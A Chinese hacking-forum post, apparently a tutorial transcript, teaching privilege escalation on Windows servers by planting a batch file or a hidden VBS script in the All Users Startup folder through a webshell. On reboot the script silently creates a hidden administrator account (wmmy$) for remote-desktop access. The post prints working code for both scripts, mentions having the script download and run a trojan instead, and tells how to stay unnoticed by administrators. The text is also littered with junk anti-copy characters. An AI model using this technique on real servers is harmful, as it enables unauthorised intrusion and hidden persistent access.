![Rank: 9](images/default/star_level3.gif) ![Rank: 9](images/default/star_level3.gif) ![Rank: 9](images/default/star_level1.gif)
- 帖子
- 575
- 积分
- 1897
- 威望
- 2479
- 金钱
- 15914
- 在线时间
- 175 小时
![管理组 管理组](images/common/medal1.gif) ![贡献奖 贡献奖](images/common/medal6.gif) ![内部成员 内部成员](images/common/medal7.gif) ![灌水王 灌水王](images/common/medal8.gif) ![帅哥勋章 帅哥勋章](images/common/medal9.gif) ![支持奖章 支持奖章](images/common/1.gif) ![突出贡献奖 突出贡献奖](images/common/2.gif) ![刻苦努力奖 刻苦努力奖](images/common/3.gif) ![优秀版主 优秀版主](images/common/4.gif) ![宣传大使奖 宣传大使奖](images/common/5.gif) ![优质人品奖章 优质人品奖章](images/common/6.gif) ![论坛元老 论坛元老](images/common/7.gif) ![管理组成员 管理组成员](images/common/8.gif) ![技术组成员 技术组成员](images/common/9.gif)
|
大家好,我是完美蚂蚁 今天给大家带来的提权教程是
. @2 V# h, j) ]5 o" I, k0 ]启动 提权
1 X6 `7 b1 |" G1 X# wC:\Docume~1\All Users\「开始」菜单\程序\启动9 J* Z2 H: ` P3 }' D
在这里必须有写入权限 否则此方法无效7 L) R( Z: g0 s$ |) v! z
因为我是在网吧 这里显示不了路径/ _; z0 p' d* o7 P5 }
我去服务器上演示给大家看" d; n% f2 j E
大家看到了把 就是这个路径 在这个里面写入文件 等候服务器从起 就会自动执行我们的1 g6 P; ]6 v: [8 i, d2 D
文件 从而运行我们的文件- H. p V, Q5 ], O% g2 Y- ~
这里有两中方式 第一种是批处理! M0 h, T; k4 f
我们来看下目前 我机器上的用户组+ O& ]$ _2 J; l0 f
目前我们没有521这个用户
; m! v% n# G* r: D+ ]看到了把 已经添加到管理组中去了 刚才我们运行程序的时候 一闪而过一个黑色提示6 O k" N5 D6 W" q* ^6 [
大家看到了吧 如果是在服务器上运行 一样会有这个提示的 细心的管理员有可能发现
2 m( X1 K6 o& _) W q4 b7 J, W下面我们来介绍第二中方法使用VBS脚本 大家都知道VBS脚本是没有这个提示的
$ ?# i1 U B! c t$ W, k0 t& |大家看 已经成功加入了WMMY用户
1 Z6 F4 I9 J4 O3 J0 G: \2 h/ M网络实战才是我们练手的目的 我已经找到一个含有这种漏洞的WBESHELL了6 H6 K0 f. F/ _7 c8 K
当前终端服务端口: 3389
' p" G" j3 Z9 E( ?系统自动登录功能未开启
9 H0 T2 z5 C: k* ?3389 已经打开了 我们只需要拥有一个管理员权限的用户就可以了* m+ g3 D: |" U2 e. X' G! a
C:\Docume~1\All Users\「开始」菜单\程序\启动 这个是默认的路径
! t a: K$ g+ q+ R+ ^$ p第一种隐蔽性太差 我们就用第二种吧5 z/ \1 V: \. u
已经写入了 我们只需要等待服务器从起 那个VBS脚本文件就会把我们的用户加入进去
8 U$ v+ T1 A# v/ v% W2 p c从而取得了3389的登陆权限1 J9 M* L) N5 H& w' m5 c6 u
其实在VBS脚本中 我们不一定需要添加管理员帐户可以 直接让VBS下载运行我们的木马! a" U5 U$ _# }! T0 G+ ]1 y9 z* @" O
基本原理都差不多 我就不多介绍了
* T6 E! q; e7 Q1 M/ T+ u f; v教程结束```
o1 K0 g' \! a, Q1 Z# z6 E( A7 Q@echo off- N2 ^; u! N* T. z
net user 521 521 /add
) R5 h! D- ~. F- V: cnet localgroup administrators 521 /add
$ I( z% b" k V1 B2 [& G* [/ v' H- ?& ]0 R4 {6 i& | ?% E
on Error Resume next
: _; Y$ k0 o% Y W' N7 Tset wshshell=createobject("wscript.shell")
* ?% n' ]! B5 o/ da=wshshell.run("net user wmmy$ 1227 /add",0)
- E {8 O& n0 x' @9 Xa=wshshell.run("net localgroup administrators wmmy$ /add",0)/ D# K- s" u! Z% C- D9 a: e
% \' v ]7 G( z4 j" f+ k6 ~9 w
! B# {! w6 T2 }4 U" Z' H点击下载( p4 l8 e8 w) `0 m7 \( T\" Z6 p* ~
|
-
2
评分人数
-
|